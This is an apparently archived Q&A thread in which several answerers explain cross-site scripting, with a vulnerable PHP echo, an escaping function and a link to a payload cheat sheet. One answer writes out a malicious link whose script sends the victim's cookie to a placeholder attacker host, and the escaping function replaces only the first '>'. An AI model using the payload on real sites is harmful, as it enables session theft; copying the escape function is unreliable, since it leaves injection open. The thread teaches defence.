tags:

views:

781

answers:

5
+2  Q: 

How does XSS works

Can someone explain how XSS works in plain english? Maybe with an example. Googling didn't help much.

+2  A: 

this Wikipedia Entry was easy enough.

gimel
+2  A: 

Cross Site Scripting basically is a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim’s cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

Example of malicious link:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

It's also common to encode the malicious code, for example in hex:

Malicious Link

CMS
It's a good thing SO is filtering that! :P
Bob Somers
Haha yes, this is a good example of proper escaping. Nice job Stack Overflow! :)
Jason
+1  A: 

I'd consider Google Ads (or any other ad platform) as an example of XSS, athough probably not deemed an 'attack' if it's at the intent of the website author.

Ady
+3  A: 

An XSS vulnerability exists whenever a string from outside your application can be interpreted as code.

For example, if you're generating HTML by doing this:

<BODY>
  <?= $myQueryParameter ?>
 </BODY>

then if the $myQueryParameter variable contains a <SCRIPT> tag then it will end up executing code.

To prevent an input from being executed as code, you need to escape content properly.

The above problem can be solved by realizing that the $myQueryParameter variable contains plain text, but you can't just go and put plain text into HTML and expect it to work.

So you need to convert plain text to HTML so you can put it into your HTML page. That process of converting a string in one language to another so that it can be embedded is escaping.

You can escape plain text to HTML with a function like:

function escapePlainTextToHTML(plainText) {
  return plainText.replace(/\0/g, '').replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/, '&gt;');
}
Mike Samuel
+1  A: 

A good resource of possible XSS techniques to inject scripts. Can be useful for testing your site against some of these:

http://ha.ckers.org/xss.html

Jason